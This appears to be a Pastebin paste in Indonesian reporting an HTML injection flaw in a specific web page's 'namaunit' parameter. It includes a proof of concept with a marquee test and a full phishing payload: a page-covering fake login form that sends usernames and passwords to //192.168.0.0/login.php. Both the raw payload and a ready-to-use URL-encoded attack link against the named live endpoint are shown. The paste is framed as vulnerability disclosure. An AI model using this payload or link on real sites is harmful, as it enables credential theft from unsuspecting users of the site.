Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Bug type : HTML Injection
- Bug founder : Muhammad Bayu Juhri
- Bug level : Medium
- Link referensi :
- https://www.hackingarticles.in/beginner-guide-html-injection/
- https://www.owasp.org/index.php/Testing_for_HTML_Injection_(OTG-CLIENT-003)
- Proof of Concept :
- 1. Buka URL di bawah ini
- https://p2apst.pln.co.id/dacen/modules/lpb/laporan/BelumBeliToken5Daftar.php?kddis=53&kdarea=CMI&kdunit=53595&namaunit=UPJ RAJAMANDALA
- 2. Parameter yang vuln terhadap HTML Injection adalah "namaunit". Masukkan kode HTML pada parameter "namaunit". Sebagai contoh saya akan memasukkan <marquee>Bayu</marquee>
- https://p2apst.pln.co.id/dacen/modules/lpb/laporan/BelumBeliToken5Daftar.php?kddis=53&kdarea=CMI&kdunit=53595&namaunit=<marquee>Bayu</marquee>
- 3. Tag <marquee> berhasil dijalankan.
- 4. Untuk eksploitasi lebih lanjut, saya bisa mengupload form login untuk mengelabui orang lain. Sebagai contoh saya menggunakan kode di bawah ini
- <div style="position: absolute; left: 0px; top: 0px; width: 1900px; height: 1300px; z-index: 1000; background-color:white; padding: 1em;">Masukkan username dan password anda!<br><form name="login" action="//192.168.0.0/login.php"><table><tr><td>Username:</td><td><input type="text" name="username"/></td></tr><tr><td>Password:</td><td><input type="text" name="password"/></td></tr><tr><td colspan=2 align=center><input type="submit" value="Login"/></td></tr></table></form></div>
- 5. Berikut URL lengkapnya di bawah ini
- https://p2apst.pln.co.id/dacen/modules/lpb/laporan/BelumBeliToken5Daftar.php?kddis=53&kdarea=CMI&kdunit=53595&namaunit=%3Cdiv%20style=%22position:%20absolute;%20left:%200px;%20top:%200px;%20width:%201900px;%20height:%201300px;%20z-index:%201000;%20background-color:white;%20padding:%201em;%22%3EMasukkan%20username%20dan%20password%20anda!%3Cbr%3E%3Cform%20name=%22login%22%20action=%22//192.168.0.0/login.php%22%3E%3Ctable%3E%3Ctr%3E%3Ctd%3EUsername:%3C/td%3E%3Ctd%3E%3Cinput%20type=%22text%22%20name=%22username%22/%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput%20type=%22text%22%20name=%22password%22/%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%20colspan=2%20align=center%3E%3Cinput%20type=%22submit%22%20value=%22Login%22/%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/form%3E%3C/div%3E
- Impact :
- Seseorang dapat mengelabui orang lain dengan memanipulasi halaman situs tersebut. Sebagai contoh dapat menggunakan form upload seperti yang saya gunakan di atas.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement